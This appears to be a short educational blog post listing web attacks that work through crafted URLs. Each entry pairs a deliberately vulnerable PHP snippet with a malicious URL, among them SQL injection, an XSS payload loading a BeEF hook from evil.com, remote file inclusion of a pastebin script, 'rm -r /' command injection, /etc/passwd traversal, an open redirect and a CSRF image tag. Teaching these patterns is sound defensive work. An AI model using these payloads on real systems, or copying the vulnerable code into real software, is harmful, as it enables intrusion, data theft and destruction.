Hacks that work just by changing the URL
- One legit and one malicious example
- Some examples require URL encoding to work (usually done automatically by browser)
SQL Injection
code:
|
1 2 3 |
$username = $_POST['username']; $pw = $_GET['password']; mysql_query("SELECT * FROM userTable WHERE username = $username AND password = $pw"); |
exploit (logs in as administrator without knowing password):
|
1 2 |
example.com/?username=Administrator&password=legalPasswordThatShouldBePostInsteadOfGet example.com/?username=Administrator&password=password' or 1=1-- |
Cross Site Scripting (XSS)
If you are curious about XSS, see my article ‘Guide in understanding XSS – XSS payloads, attack vectors, BeEF hooking, MiTM with Shank and some history‘
code:
|
1 2 |
$nickname= $_GET['nickname']; echo "Your nickname is $nickname\n"; |
exploit (registrers visiting user as a zombie in BeEF):
|
1 2 |
example.com/?nickname=Karrax example.com/?nickname=script src="evil.com/beefmagic.js.php" |
Remote code execution
code:
|
1 |
include($_GET["module"].".php"); |
exploit (downloads and runs arbitrary code) :
|
1 2 |
example.com/?module=frontpage example.com/?module=pastebin.com/mymaliciousscript |
Command injection
code:
|
1 |
echo shell_exec('cat '.$_GET['filename']); |
exploit (tries to delete all files from root directory):
|
1 2 |
example.com/?filename=readme.txt example.com/?filename=readme.txt;rm -r / |
Code injection
code:
|
1 2 3 |
$myvar = "varname"; $x = $_GET['arg']; eval("\$myvar = \$x;"); |
exploit (injects phpinfo() command which prints very usefull attack info on screen):
|
1 2 |
example.com/?arg=1 example.com/?arg=1; phpinfo() |
LDAP injection
code:
|
1 2 3 |
$username = $_GET['username']; $password = $_GET['password']; ldap_query("(&(cn=$username)(password=$password)") |
exploit (logs in without knowing admin password):
|
1 2 |
example.com/?username=admin&password=adminadmin example.com/?username=admin&password=* |
Path traversal
code:
|
1 |
include("./" . $_GET['page']); |
exploit (fetches /etc/passwd):
|
1 2 |
example.com/?page=front.php example.com/?page=../../../../../../../../etc/passwd |
Redirect/Forward attack
code:
|
1 2 |
$redirectUrl = $_GET['url']; header("Location: $redirectUrl"); |
exploit (Sends user from your page to evil page) :
|
1 2 |
example.com/?url=example.com/faq.php example.com/?url=evil.com/sploitCode.php |
Failure to Restrict URL Access
code:
N/A. Lacking .htaccess ACL or similar access control. Allows user to guess or by other
means discover the location of content that should only be accessible while logged in.
exploit:
|
1 2 |
example.com/users/showUser.php example.com/admins/editUser.php |
Cross-Site Request Forgery
code:
N/A. Code lacks page to page secret to validate that request comes from current site.
Implement a secret that is transmitted and validated between pages.
exploit:
|
1 2 |
Legal submit: example.com/app/transferFunds?amount=1500&destinationAccount=4673243243 On evil page: img src="http://example.com/app/transferFunds?amount=1500 destinationAccount=evilAccount#" width="0" height="0" |
Buffer overflow (technically by accessing an URL, but implemented with metasploit)
code:
N/A. Vulnerability in the webserver code itself. Standard buffer overflow
Exploit:
http://www.exploit-db.com/exploits/16798/
Loading tweets...